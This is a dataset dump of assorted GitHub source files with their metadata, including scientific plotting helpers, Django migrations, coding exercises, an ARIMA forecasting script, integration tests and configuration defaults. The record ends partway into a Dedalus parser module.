blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 220
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 257
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
334772388d96c3e0ad4ac2d3e821f92425e6ed27
|
8cbd6648596a78a6ab62bf2201eb7a93d608c59a
|
/visualization.py
|
81e4019b045bf9351e4509748dc31a8c599afd95
|
[] |
no_license
|
chengeaa/researchscripts
|
a1a1a6f6af900bca3cd8fdf68585d14dce88e8e2
|
f677b1c515e4406dcf1b046f11b704b64d0dc2ce
|
refs/heads/master
| 2022-05-16T23:59:42.984438
| 2022-05-10T02:35:32
| 2022-05-10T02:35:32
| 196,303,412
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,198
|
py
|
#imports
#base
import os
import re
#ase
from ase.io import vasp, gen
from ase.visualize.plot import plot_atoms
from ase.visualize import view
#scipy
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
#functions
def show_atoms_grid(data, rotation = '-0x,0y,0z', save= False, filename = 'grid_configs'):
'''
Where data is list of Atoms objects
'''
dim = int(np.ceil(np.sqrt(len(data))))
fig, axarr = plt.subplots(dim, dim, figsize=(25, 25))
for i, config in enumerate(data):
plot_atoms(config, axarr[i%dim,i//dim], rotation = rotation)
if save:
fig.savefig(filename + ".png")
def viewStructs(name, directory, kind = 'gen'):
"""
View collection of structures as a "trajectory"
Args:
- name (str): substring unique to structures (.gen, POSCAR, slab, etc)
- directory (str): Directory where the structures live
- kind: kind of output froim list of (vasp, gen)
Opens viewer with loaded trajectory (if remote, need X server)
"""
geometries = []
files = os.listdir(directory)
if kind == 'gen':
pattern = r"{}.*.gen".format(name)
elif kind == 'vasp':
pattern = r"{}".format(name)
else:
raise ValueError("file kind must be from (vasp, gen)")
for i in files:
key = re.search(pattern, i)
if key:
if kind == 'gen':
geometries += [gen.read_gen(directory + i)]
elif kind == 'vasp':
geometries += [vasp.read_vasp(directory + i)]
else:
raise ValueError("file kind must be from (vasp, gen)")
view(geometries)
def plotElemDist(data, targetElem = "C", latticeElems = ["Si", "N", "H"], nbins = 25, stacked = False):
"""
Plot distribution of element within slab, data should be arraylike collection of stuctures
"""
targetZs = []
latticeZs = []
# populate a cZs list of hists, latticeZs list of hists
for key, value in data.iteritems():
targetZs += [atom.position[2] for atom in value if atom.symbol == targetElem]
latticeZs += [atom.position[2] for atom in value if atom.symbol in latticeElems]
minZ, maxZ = np.min(latticeZs), np.max(latticeZs)
bins = np.linspace(minZ, maxZ, nbins)
width = (maxZ-minZ)/nbins
if stacked:
h = plt.hist([targetZs, latticeZs], bins = bins, density = True, alpha = 1,
label = "stacked {} and {} distributions".format(targetElem, latticeElems), stacked = True)
plt.vlines([minZ, maxZ], 0, np.max(h[:1]), label = "min and max Z positions")
else:
h1 = plt.hist(targetZs, bins = bins, density = True, alpha = 0.8,
label = "{} distribution".format(targetElem))
h2 = plt.hist(latticeZs, bins = bins, density = True, alpha = 0.2,
label = "{} distribution".format(latticeElems))
plt.vlines([minZ, maxZ], 0, np.max([h1[:1], h2[:1]]), label = "min and max Z positions")
plt.legend()
plt.show()
def getabBondcountStructure(data, idx, element):
"""
Gets a struture with 'charges' equal to nbonds between a (fixed) and b(``element``)
data needs geom, coordlabels, and (optionally) wantedIndices columns
geom is Atoms object of structure
coordlabels is a raw output from the coordlabeller function (relcoords and raw bonds)
element is desired secondary element (primary element determined by input)
Calls view() on resulting geometry
Returns the structure
"""
coordlabels = data.loc[idx, 'coordlabels']
geometry = data.loc[idx, 'geom']
if 'wantedIndices' in data:
indices = data.loc[idx, 'wantedIndices']
else:
indices = np.arange(len(geometry))
bondcounts = {key: np.sum(
np.array([geometry[i].symbol for i in value]) == element
) for key, value in
pd.Series(coordlabels[1])[indices].items()
}
charges = [0] * len(geometry)
for i in range(len(charges)):
charges[i] = bondcounts.get(i, -1)
geometry.set_initial_charges(charges)
view(geometry)
return geometry
|
[
"ckaiwen2@hotmail.com"
] |
ckaiwen2@hotmail.com
|
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533
| 2018-03-13T12:17:11
| 2018-03-13T12:17:11
| 29,589,268
| 5
| 10
|
BSD-3-Clause
| 2018-02-23T14:43:12
| 2015-01-21T12:51:24
|
Python
|
UTF-8
|
Python
| false
| false
| 575
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207
| 2021-03-29T15:23:05
| 2021-03-29T15:23:05
| 294,181,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
|
[
"ivailo.atanasov93@gmail.com"
] |
ivailo.atanasov93@gmail.com
|
f999bc0811f3d15a0bf554e32cd623a97861a497
|
f9b047b25184787af88fd151f2a6226b6b342954
|
/investmentTornadoServer/server/corpora.py
|
6d0570a7cfa8308f2e0cc773ff1adf8306bb5b7b
|
[] |
no_license
|
CallMeJiaGu/TonrnadoRecomendServer
|
4bfc3dd6d6a432321f80b12d66bb424fbc1a0911
|
54bb21191b16da27c20ce64ab14762bc777e30ca
|
refs/heads/master
| 2020-03-23T19:31:43.291995
| 2019-07-04T03:04:58
| 2019-07-04T03:04:58
| 141,984,920
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,210
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Wu Yuanchao <151050012@hdu.edu.cn>
import logConfig
import logging
import os
import codecs
logger = logging.getLogger()
class CorporaWithTitle():
def __init__(self, cutedfile):
self.f = cutedfile
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[0], cols[1:]
class CorporaWithoutTitle():
def __init__(self, cuted_file):
self.f = cuted_file
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[1:]
class CorporaCut():
def __init__(self, rawfile, cuttor):
self.rawfile = rawfile
self.cuttor = cuttor
def __iter__(self):
with codecs.open(self.rawfile, 'r', 'utf-8') as f:
for i, line in enumerate(f):
cols = line.strip().split(',')
title, content = cols[0].strip().lower(), u' '.join(cols[1:]).lower()
tokens = self.cuttor.fltcut(content)
if len(tokens) > 0:
yield title.encode('utf8'), tokens
else:
logger.warn('line %d skiped' % i)
def process_rawcorpora(rawfile, target, cuttor):
cuted_corpora = CorporaCut(rawfile, cuttor)
with codecs.open(target, 'w', 'utf-8') as f:
for title, tokens in cuted_corpora:
try:
f.write(title + ' ' + u' '.join(tokens) + os.linesep)
except Exception, e:
logger.error((title, tokens, e))
def load_words(dirname):
words = set()
for fname in os.listdir(dirname):
print('load from ' + fname)
for line in codecs.open(os.path.join(dirname, fname), 'r', 'utf-8'):
for w in set(line.strip().split()):
words.add(w)
return words
if __name__ == '__main__':
from mycut import FilterCut
cuttor = FilterCut()
r = './test/raw/paper_error.txt'
t = './test/cut/test.txt'
process_rawcorpora(r, t, cuttor)
|
[
"646696382@qq.com"
] |
646696382@qq.com
|
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664
| 2020-01-21T08:29:48
| 2020-01-21T08:29:48
| 227,506,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jeongwook.yu@utexas.edu"
] |
jeongwook.yu@utexas.edu
|
d7ce13d83dd278c415907caea2967729f60ed941
|
78a8c8a60b9ebb6c5e01528253971f8464acdc27
|
/python/problem79.py
|
be165c1f7339f7177c38ab3d2d5c3cc45a096b0d
|
[] |
no_license
|
hakver29/project_euler
|
f1b2d19f0bf2c6b842256f961845424cd2dc696f
|
ab356a32d706759531cad7a1a6586534ff92c142
|
refs/heads/master
| 2021-06-03T13:39:22.758018
| 2020-12-01T23:42:35
| 2020-12-01T23:42:35
| 70,273,535
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import pandas as pd
import os
path = './p079_keylog.txt'
data = pd.read_csv(path, header=None)
print(data)
# First letter: [1,3,6,7]
# Only 7 is always first: 7
# Second letter: [1,2,3,6]
# 3 before 1
# 3 before 6
# 3 before 2
# Second letter: 3
# Third letter: [0, 1,2,6,7,8,9]
# 1 before 9 2 8 6 0
# Third letter: 1
# Fourth letter: [0,2,6,8,9]
# 6 before 0,2,8,9
# Fourth letter: 6
# Fifth letter: [0,2,8,9]
# 8 before 0
# 9 before 0
# 8 before 9
# 2 before 9
# 2 before 8
# Fifth letter: 2
# Sixth letter: [0,8,9]
# Remaining: 890
# Answer: 73162890
|
[
"haakongv@stud.ntnu.no"
] |
haakongv@stud.ntnu.no
|
dedc1e2d4474ac95a338056cb6ee689645ed4e0c
|
3607629e732c37f40231fe4c83e73ac087ed3fcf
|
/poc-todo/POC/APP/Task/migrations/0004_remove_usertasks_first_name.py
|
08ca53373c7ef5acfe15379664dd64b1b080bddd
|
[] |
no_license
|
gout-tech/apis_cusat_connect
|
3d71f73a620b7fa489671f45cbce7cc7b6972f80
|
fd7114480592e81ead6e2efe932504629c2ff696
|
refs/heads/master
| 2022-05-29T14:10:10.326086
| 2020-02-25T04:18:38
| 2020-02-25T04:18:38
| 242,907,961
| 0
| 0
| null | 2022-04-22T23:06:17
| 2020-02-25T04:17:32
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
# Generated by Django 2.2.1 on 2019-08-12 13:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Task', '0003_usertasks_first_name'),
]
operations = [
migrations.RemoveField(
model_name='usertasks',
name='first_name',
),
]
|
[
"goutham.hashrot@gmail.com"
] |
goutham.hashrot@gmail.com
|
9152ac03f49d6c145510fb642b234cac13c0b135
|
23e0f2433ae89295766a24d8d87626d18af6e84c
|
/problems/abc179_a.py
|
78c1867f75ae21403e67d3de6f63c06edac7d487
|
[] |
no_license
|
chokoryu/atcoder
|
0d7ec486177e45abee847acde38d31d35c61df42
|
e0c0920a7a4d8a90fd6fb3cab7ab1e97a95b9084
|
refs/heads/master
| 2023-02-06T12:06:09.562394
| 2020-12-29T02:42:54
| 2020-12-29T02:42:54
| 283,260,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from fractions import gcd
from collections import Counter, deque, defaultdict
from heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge
from bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort
from itertools import accumulate, product, permutations, combinations
def main():
S = input()
if S[-1] == 's':
print(S + 'es')
else:
print(S + 's')
if __name__ == '__main__':
main()
|
[
"chokoryu@gmail.com"
] |
chokoryu@gmail.com
|
70a9392a3f153d8f770b23044ec2533f41dc3a2f
|
c4e3f8ba5ddadcdb8f6cd818623745951318a8d9
|
/Arima_smape.py
|
b092a690a460877f73ec5cbcae499a9f165f3076
|
[] |
no_license
|
wangningjun/ARIMA_time_serise
|
8a70e55a14399d1bb435180656ab2e0336224248
|
8eb526feac394e4043be7467b1407b80095e3df4
|
refs/heads/master
| 2020-03-26T13:59:12.343731
| 2018-10-12T03:08:30
| 2018-10-12T03:08:30
| 144,965,956
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,201
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from statsmodels.tsa.arima_model import ARIMA
import os
from pandas.core.frame import DataFrame
from sys import maxsize
'''
更新日期:2018/8/28
说明:本脚本的内容是以ARIMA算法预测时间序列
更新说明:实现动态调参
准确预测未来n时刻的数据,统计smape
'''
def difference(dataset, interval=1):
diff = list()
for i in range(interval, len(dataset)):
value = dataset[i] - dataset[i - interval]
diff.append(value)
return np.array(diff)
# invert differenced value
def inverse_difference(history, yhat, interval=1):
return yhat + history[-interval]
def Arima_up(x):
differenced = difference(x, days_up)
_, p, q, _ = proper_model(differenced,3)
print(p,q)
model = ARIMA(differenced, order=(p, 0, q))
ARIMA_model = model.fit(disp=0)
return ARIMA_model
def Arima_down(x):
differenced = difference(x, days_down)
_,p,q,_ = proper_model(differenced,3)
print(p,q)
model = ARIMA(differenced, order=(p, 0, q))
ARIMA_model = model.fit(disp=0)
return ARIMA_model
def predict(X,model,days):
# 在训练的时间段内,predict和fittedvalues的效果一样,不同的是predict可以往后预测
differenced = difference(X, days)
start_index = len(differenced)
end_index = len(differenced) + predict_long
forecast = model.predict(start=int(start_index), end=int(end_index))
history = [x for x in X]
# plt.plot(history, color='red', label='predict_data')
for yhat in forecast:
inverted = inverse_difference(history, yhat, days)
if inverted<0: # 预测出来小于0的值全都填为0
inverted = 0
history.append(inverted)
return history
def show(predict,realy):
plt.figure(figsize=(8, 4))
plt.subplot(2, 1, 1)
plt.plot(predict, color='red', label='predict')
plt.subplot(2, 1, 2)
plt.plot(realy, color='red', label='realy')
plt.show()
def show_double(predict,realy):
plt.figure(figsize=(8, 4))
plt.subplot(2, 1, 1)
plt.plot(predict, color='red', label='predict')
plt.subplot(2, 1, 2)
plt.plot(realy, color='blue', label='realy')
plt.show()
def proper_model(data_ts, maxLag):
init_bic = maxsize
init_p = 0
init_q = 0
init_properModel = None
for p in np.arange(maxLag):
for q in np.arange(maxLag):
model = ARIMA(data_ts, order=(p,0,q))
try:
results_ARIMA = model.fit(disp=-1)
except:
continue
bic = results_ARIMA.bic
if bic < init_bic:
init_p = p
init_q = q
init_properModel = results_ARIMA
init_bic = bic
return init_bic, init_p, init_q, init_properModel
'''
if __name__ == '__main__':
days_up = 24
days_down = 24
predict_long = 29
path_in = 'data/in/outdata/' # 文件夹路径
path_out = 'data/out/'
count = 0
for file in os.listdir(path_in):
df = open(path_in + file, 'rb') # file
data = pd.read_csv(df, header=None)
data.columns = ['time', 'up', 'down']
# data = pd.read_csv(df) # 存在抬头的情况
len_data = len(data)
data_ = data.head(len_data-(predict_long+1)) # 除去最后三十行 都要
if len(data_) < predict_long:
continue
X1 = data_['up']
X2 = data_['down']
try:
model_up = Arima_up(X1)
except:
continue
# try:
# model_down = Arima_down(X2)
# except:
# continue
results_pre_up = predict(X1, model_up, days_up)
# results_pre_down = predict(X2, model_down, days_down)
count += 1
real_up = data['up'].tail(predict_long+1)
real_down = data['down'].tail(predict_long+1)
pre_up_long = np.array(results_pre_up[-(predict_long+1):])
show(pre_up_long, real_up) # 展示预测的三十天和真实的三十天
smape_up = sum(abs( pre_up_long- real_up.values)/(pre_up_long+real_up.values))/(predict_long+1)*2
# smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2
print(smape_up)
'''
if __name__ == '__main__':
days_up = 24
days_down = 24
predict_long = 29
path_in = 'data/in/data/' # 文件夹路径
path_out = 'data/out/'
for file in os.listdir(path_in):
df = open(path_in + file, 'rb') # file
# data = pd.read_csv(df, header=None)
# data.columns = ['time', 'up', 'down']
data = pd.read_csv(df) # 存在抬头的情况
real_up = data['down'][-days_down*2:-days_down]
pre_up = data['down'].tail(days_up)
show(real_up, pre_up) # 展示预测的24天和真实的24天
real_up = real_up.values
pre_up = np.array(pre_up.values)
smape_up = sum(abs(real_up- pre_up)/(real_up+pre_up))/(days_up)*2
print(smape_up)
# smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2
|
[
"ningjun_wang@163.com"
] |
ningjun_wang@163.com
|
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409
| 2020-10-16T03:41:54
| 2020-10-16T03:41:54
| 304,511,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
|
[
"pfpacheco@gmail.com"
] |
pfpacheco@gmail.com
|
811d4c6beed89125664d5495f5675efc4f51e2f2
|
3d18dbe77b052754e2a7a9bbaee9650a9fb410e2
|
/test/11-ignore-design-docs.py
|
ea7165e3f5b58d5a27a8d4f9da83c47858fcd920
|
[
"Apache-2.0"
] |
permissive
|
apache/couchdb-mango
|
765ebceec2912acb9696fadf9ec8f3d244d604c6
|
312e2c45535913c190cdef51f6ea65066ccd89dc
|
refs/heads/master
| 2023-07-02T18:36:31.552696
| 2017-02-07T16:40:09
| 2017-03-31T17:25:17
| 30,287,956
| 39
| 23
|
Apache-2.0
| 2023-01-18T14:24:00
| 2015-02-04T08:00:05
|
Erlang
|
UTF-8
|
Python
| false
| false
| 1,106
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import mango
import unittest
DOCS = [
{
"_id": "_design/my-design-doc",
},
{
"_id": "54af50626de419f5109c962f",
"user_id": 0,
"age": 10,
"name": "Jimi"
},
{
"_id": "54af50622071121b25402dc3",
"user_id": 1,
"age": 11,
"name": "Eddie"
}
]
class IgnoreDesignDocsForAllDocsIndexTests(mango.DbPerClass):
def test_should_not_return_design_docs(self):
self.db.save_docs(DOCS)
docs = self.db.find({"_id": {"$gte": None}})
assert len(docs) == 2
|
[
"garren.smith@gmail.com"
] |
garren.smith@gmail.com
|
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293
| 2021-01-16T13:15:56
| 2021-01-16T13:15:56
| 330,166,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"69420960+deesaw@users.noreply.github.com"
] |
69420960+deesaw@users.noreply.github.com
|
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667
| 2022-07-14T07:05:43
| 2022-07-14T07:05:43
| 259,882,446
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
|
[
"matthias@urlichs.de"
] |
matthias@urlichs.de
|
22aa2617e351bbbaf035cb3b8ac08016c4632660
|
41278a3ab6c8b8f280e785b79c15377a2de56a2d
|
/guardian.py
|
680dbcc6516d80fb29ac29c6bda4d43391c6e140
|
[] |
no_license
|
mayanand/restClient
|
1f0c70aad91d15c1a8d7f53bdc5c5c89ab6e5db8
|
927cffc1f2374760633da4bf6555801a80983469
|
refs/heads/master
| 2021-03-08T19:25:38.925946
| 2016-04-14T00:04:46
| 2016-04-14T00:04:46
| 56,193,486
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#!/usr/bin/env python
from restapi import restAPI
from image import imageDownloader
class guardianRestAPI(restAPI):
def __init__(self):
restAPI.__init__(self)
self.RESTendpoint = "http://content.guardianapis.com/search?q=%s&api-key=%s"
self.apiKey = 'test'
def parseGuradianJSON(self, topic):
result = self.connect_api(topic)
imageDownloader_obj = imageDownloader()
for element in result['response']['results']:
imageDownloader_obj.get_images(element['webUrl'])
#pprint.pprint(result)
if __name__ == '__main__':
g_obj = guardianRestAPI()
g_obj.parseGuradianJSON('obama')
|
[
"Mayank Anand"
] |
Mayank Anand
|
61c547985ebd1624cef39b0279164ca64369bd8b
|
54a2ac1972aa12e97e1029dddac6908a0e457d1c
|
/ej22.py
|
d564606a9f466aa3698b9b3467e6bba2ad18706d
|
[] |
no_license
|
bthecs/computacion-2
|
2e7b557ab365e74634772f58067b2bbe0ea5d1d3
|
69d54714da8f40fbef9a6635b4fe6b1b1638a11e
|
refs/heads/master
| 2023-03-18T22:38:21.953987
| 2019-12-11T15:42:25
| 2019-12-11T15:42:25
| 343,834,502
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from multiprocessing import Queue, Lock
import threading
import time
import os
def thread_function(x,l,q):
l.acquire()
time.sleep(1)
q.put("mi PID es: %d,Nombre: %s, Thread %d,Proceso: %d"%(os.getpid(),threading.current_thread().getName(),threading.get_ident(),x))
l.release()
def mostrarCola(q):
while True:
print(q.get())
if q.empty():
break
if __name__ == "__main__":
q = Queue()
l = Lock()
pid=os.getpid()
for x in range(3):
p1 = threading.Thread(target=thread_function, args=(x,l,q))
p1.start()
time.sleep(1)
p1.join()
mostrarCola(q)
|
[
"fl.gimenez@alumno.um.edu.ar"
] |
fl.gimenez@alumno.um.edu.ar
|
e2165c7579217230237b68c6b491e3e20486e06b
|
c4ea97ae471cd222378684b8dc6be1047836dc85
|
/src/dedt/dedalusParser.py
|
9ba5de3d8b1778559ec87925a329aaff254cb7aa
|
[
"MIT"
] |
permissive
|
KDahlgren/iapyx
|
b3de26da34ffd7dcc255afd9b70fe58de543711b
|
260a265f79cd66bf4ea72b0a4837517d460dc257
|
refs/heads/master
| 2018-10-01T06:45:15.986558
| 2018-06-22T01:38:22
| 2018-06-22T01:38:22
| 109,737,208
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,697
|
py
|
#!/usr/bin/env python
'''
dedalusParser.py
Define the functionality for parsing Dedalus files.
'''
import inspect, logging, os, re, string, sys, traceback
from pyparsing import *
import ConfigParser
# ------------------------------------------------------ #
# import sibling packages HERE!!!
if not os.path.abspath( __file__ + "/../.." ) in sys.path :
sys.path.append( os.path.abspath( __file__ + "/../.." ) )
from utils import tools
